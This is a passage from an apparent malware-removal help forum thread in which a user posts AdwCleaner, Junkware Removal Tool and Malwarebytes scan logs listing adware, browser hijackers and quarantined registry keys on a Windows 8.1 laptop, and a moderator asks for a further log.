    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [-] Data restored: HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{20B9D1AE-AD1A-38B4-87FE-AF278DA9861D}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86}
    [-] Data restored: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes [DefaultScope] {0633EE93-D776-472f-A0FF-E1416B8B2E3A}
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6586d803-df30-46d3-a89a-4136c8571d45}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKLM\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKLM\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinZipper
    [-] Key deleted: HKCU\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [-] Key deleted: HKLM\SOFTWARE\Mozilla\Firefox\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [#] Key deleted on reboot: HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [#] Key deleted on reboot: HKCU\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
    [#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\e24b7131-d039-43cb-9e6f-ad4be601ec1f
    [#] Key deleted on reboot: HKLM\SYSTEM\ControlSet001\Control\Power\User\PowerSchemes\04262113-2a31-48e1-b4bb-3b42174bea0f
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [WinSAPSvc]
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [ArcherGroupEx]
    [-] Key deleted: HKLM\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinZipper
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [GubedZLGroupEx]
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost [GubZLGroEx]
    [-] Key deleted: HKCU\SOFTWARE\Classes\ChromeHTML
    [-] Key deleted: HKCU\SOFTWARE\Clients\StartMenuInternet\ChromeHTML
    [-] Value deleted: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [#] Value deleted on reboot: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [#] Value deleted on reboot: HKLM\SOFTWARE\Mozilla\Firefox\Extensions [arthurj8283@gmail.com]
    [-] Key deleted: HKCU\Software\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [-] Key deleted: HKLM\SOFTWARE\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [#] Key deleted on reboot: [x64] HKCU\Software\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej
    [-] Key deleted: [x64] HKLM\SOFTWARE\Google\Chrome\Extensions\ljibkigjccbegnbeojkoafejpoiachej


    ***** [ Web browsers ] *****

    [-] Firefox fake profile cleaned: Profile1
    [-] Firefox preferences cleaned: "browser.search.defaultenginename" - "nice"
    [-] Firefox preferences cleaned: "browser.search.order.1" - "nice"
    [-] Firefox preferences cleaned: "browser.search.searchengine.iconURL" - "hxxp://www.luckysearch123.com/favicon.ico?t=1"
    [-] Firefox preferences cleaned: "browser.search.searchengine.url" - "hxxp://www.luckysearch123.com/search.php?type=ds&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg&q={searchTerms}"
    [-] Firefox preferences cleaned: "browser.search.selectedEngine" - "nice"
    [-] Firefox preferences cleaned: "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.newtab.url" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] Firefox preferences cleaned: "browser.search.searchengine.iconURL" - "hxxp://www.luckysearch123.com/favicon.ico?t=1"
    [-] Firefox preferences cleaned: "browser.search.searchengine.url" - "hxxp://www.luckysearch123.com/search.php?type=ds&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg&q={searchTerms}"
    [-] Firefox preferences cleaned: "browser.startup.homepage" - "hxxp://www.luckysearch123.com?type=hp&ts=1487229756&from=14a10216&uid=toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: go search
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: delta-homes
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: delta-homes_
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9_
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: omniboxes
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: search.delta-homes.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: v9.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: palikan.com
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: ljibkigjccbegnbeojkoafejpoiachej
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [extension] Deleted: noajmlkipclmeolfcnflkjhijkigpfjh
    [-] [C:\Users\User\AppData\Local\Google\Chrome\User Data\Default] [homepage] Deleted: hxxp://www.palikan.com/?f=1&a=plk_dstndrm_15_51&cd=2XzuyEtN2Y1L1Qzu0A0C0DtC0BzzyE0BtD0F0AtD0FtAtC0EtN0D0Tzu0StCyEyEyCtN1L2XzutAtFtCyDtFtAtFtDtN1L1Czu1ByEtN1L1G1B1V1N2Y1L1Qzu2SyD0EyBzyyDtCtDtCtGyCyE0FzytG0AyEzzyEtGtB0AzztCtGtDyByCzyyCtA0AtAzz0BtD0F2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyD0AzyzytDyD0CtAtG0Azz0CzztGyEtC0C0AtG0BzzyBtCtGtBtCtAyByE0CtDzy0F0ByE0A2QtN0A0LzuyE&cr=513584365&ir=


    *************************

    :: "Tracing" keys deleted
    :: Winsock settings cleared

    *************************

    C:\AdwCleaner\AdwCleaner[C0].txt - [24497 Bytes] - [15/03/2017 14:04:22]
    C:\AdwCleaner\AdwCleaner[S0].txt - [35461 Bytes] - [15/03/2017 13:04:57]
    C:\AdwCleaner\AdwCleaner[S1].txt - [35272 Bytes] - [15/03/2017 13:16:56]
    C:\AdwCleaner\AdwCleaner[S2].txt - [32837 Bytes] - [15/03/2017 14:00:26]

    ########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [24793 Bytes] ##########
     
  14. 2017/03/15
    scgoh123 Well-Known Member Thread Starter

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.1.2 (03.10.2017)
    Operating System: Windows 8.1 Single Language x64
    Ran by User (Administrator) on 15-Mar-17 at 20:26:42.76
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




    File System: 3

    Failed to delete: C:\Program Files (x86)\sogouinput (Folder)
    Successfully deleted: C:\Users\Public\thunder network (Folder)
    Successfully deleted: C:\Windows\system32\Tasks\SogouImeMgr (Task)

    Deleted the following from C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\prefs.js
    user_pref(browser.search.searchengine.alias, );
    user_pref(browser.search.searchengine.name, luck);
    user_pref(browser.search.searchengine.ref, );
    user_pref(browser.search.searchengine.ts, 1487229756);
    user_pref(browser.search.searchengine.type, );
    user_pref(browser.search.searchengine.uid, toshibaxmq01abf050_z4lkc79ytxxz4lkc79yt);



    Registry: 0





    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Scan was completed on 15-Mar-17 at 20:37:58.86
    End of JRT log
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
     
  15. 2017/03/15
    broni Moderator Malware Analyst

    I still need the MBAM log.
     
  16. 2017/03/19
    scgoh123 Well-Known Member Thread Starter

    Sorry for the late reply because her laptop hangs too often. And there are 15k+ infected objects (OMG)
    Malwarebytes
    www.malwarebytes.com

    -Log Details-
    Scan Date: 3/15/17
    Scan Time: 2:28 PM
    Logfile: mbam.txt
    Administrator: Yes

    -Software Information-
    Version: 3.0.6.1469
    Components Version: 1.0.75
    Update Package Version: 1.0.1506
    License: Trial

    -System Information-
    OS: Windows 8.1
    CPU: x64
    File System: NTFS
    User: ASUS\User

    -Scan Summary-
    Scan Type: Threat Scan
    Result: Completed
    Objects Scanned: 432656
    Time Elapsed: 26 min, 46 sec

    -Scan Options-
    Memory: Enabled
    Startup: Enabled
    Filesystem: Enabled
    Archives: Enabled
    Rootkits: Disabled
    Heuristics: Enabled
    PUP: Enabled
    PUM: Enabled

    -Scan Details-
    Process: 0
    (No malicious items detected)

    Module: 0
    (No malicious items detected)

    Registry Key: 5
    PUP.Optional.Elex.SHHKRST, HKLM\SOFTWARE\CLASSES\CLSID\{6710C780-E20E-4C49-A87D-321850ED3D7C}, Quarantined, [446], [316937],1.0.1506
    PUM.Optional.ProxyHijacker, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, Quarantined, [15347], [-1],0.0.0
    PUP.Optional.Trotux, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}, Quarantined, [420], [182847],1.0.1506
    Trojan.Agent, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MRT.EXE, Quarantined, [22], [211066],1.0.1506
    Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MRT.EXE, Quarantined, [22], [211066],1.0.1506

    Registry Value: 12
    PUM.Optional.ProxyHijacker, HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYSERVER, Quarantined, [15347], [250493],1.0.1506
    PUM.Optional.ProxyHijacker, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Removal Failed, [15347], [-1],0.0.0
    PUM.Optional.ProxyHijacker, HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Removal Failed, [15347], [-1],0.0.0
    PUM.Optional.ProxyHijacker, HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYSERVER, Quarantined, [15347], [-1],0.0.0
    PUM.Optional.ProxyHijacker, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Removal Failed, [15347], [-1],0.0.0
    PUP.Optional.Trotux, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|HP, Quarantined, [420], [182847],1.0.1506
    PUP.Optional.Trotux, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|TAB, Quarantined, [420], [182847],1.0.1506
    PUP.Optional.Trotux, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|SP, Quarantined, [420], [182847],1.0.1506
    PUP.Optional.Trotux, HKLM\SOFTWARE\MOZILLA\FIREFOX\{EB52F1AB-3C2B-424F-9794-833C687025CF}|SURL, Quarantined, [420], [182847],1.0.1506
    Trojan.Agent, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MRT.EXE|DEBUGGER, Quarantined, [22], [211066],1.0.1506
    Trojan.Agent, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\MRT.EXE|DEBUGGER, Quarantined, [22], [211066],1.0.1506
    PUP.Optional.GoSearchMe, HKU\S-1-5-21-3023424667-1579791547-2771295078-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\ABOUTURLS|TABS, Quarantined, [8599], [238864],1.0.1506

    Registry Data: 0
    (No malicious items detected)

    Data Stream: 0
    (No malicious items detected)

    Folder: 2532
    PUP.Optional.Ghokswa, C:\PROGRAMDATA\Newjob, Quarantined, [27], [325135],1.0.1506
    Adware.Ghokswa, C:\Program Files (x86)\Outbob\Application\VisualElements, Quarantined, [557], [360395],1.0.1506
    Adware.Ghokswa, C:\Program Files (x86)\Outbob\Application\locales, Quarantined, [557], [360395],1.0.1506
    Adware.Ghokswa, C:\Program Files (x86)\Outbob\Application\bin, Quarantined, [557], [360395],1.0.1506
    Adware.Ghokswa, C:\Program Files (x86)\Outbob\Application, Quarantined, [557], [360395],1.0.1506
    Adware.Ghokswa, C:\PROGRAM FILES (X86)\Outbob, Delete-on-Reboot, [557], [360395],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\el, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\de, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\da, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales\cs, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_TW, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\zh_CN, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\en_GB, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\_locales, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_BR, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\cast_setup, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pt_PT, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\apifmdobolibbidmcdlofnnenabonodd\1.0.0.2_0\_locales\pt_BR, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Service Worker\CacheStorage\b1c1ce0d575020c49d5cfa4e146fef4c25e36f82, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\apifmdobolibbidmcdlofnnenabonodd\1.0.0.2_0\_locales\zh_TW, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\apifmdobolibbidmcdlofnnenabonodd\1.0.0.2_0\_locales\zh_CN, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Service Worker\CacheStorage\28da9c56fde4021055a681112c092453f74d8dd8, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_metadata, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\es_419, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\fil, Delete-on-Reboot, [15], [329198],1.0.1506
    PUP.Optional.Elex, C:\Users\User\AppData\Local\comapyreawecultetesp\chagulybuvertainmibile\Extensions\boadgeojelhgndaghljhdicfkmllpafd\15.1120.0.4_0\_locales, Delete-on-Reboot, [15], [329198],1.0.1506
     
  17. 2017/03/19
    scgoh123

    (Part 2)
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\lv, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\nb, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\es_419, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\nl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.0_0\_locales\pl, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.cdn-net.com, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\PE4PBYBY\www.ajaxcdn.org, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\apdfllckaahabafndbhieahigkjlhalf\14.1_0\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.1_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\zh_HK, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\en_US, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.4_1\_locales\fr_CA, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm\5216.530.0.10_0\cloud_route_details, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Pepper Data\Shockwave Flash\WritableRoot\#SharedObjects\9VTXDCNT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\en_US, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\pt_BR, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\pt_PT, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.9_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\zh_CN, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.1_0\_locales\zh_TW, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\en_GB, Quarantined, [27], [325136],1.0.1506
    PUP.Optional.Ghokswa, C:\Users\User\AppData\Local\Newjob\User Data\chagulybuvertainmibile\Extensions\aohghmighlieiainnegkcijnfilokake\0.9_0\_locales\en_US, Quarantined, [27], [325136],1.0.1506
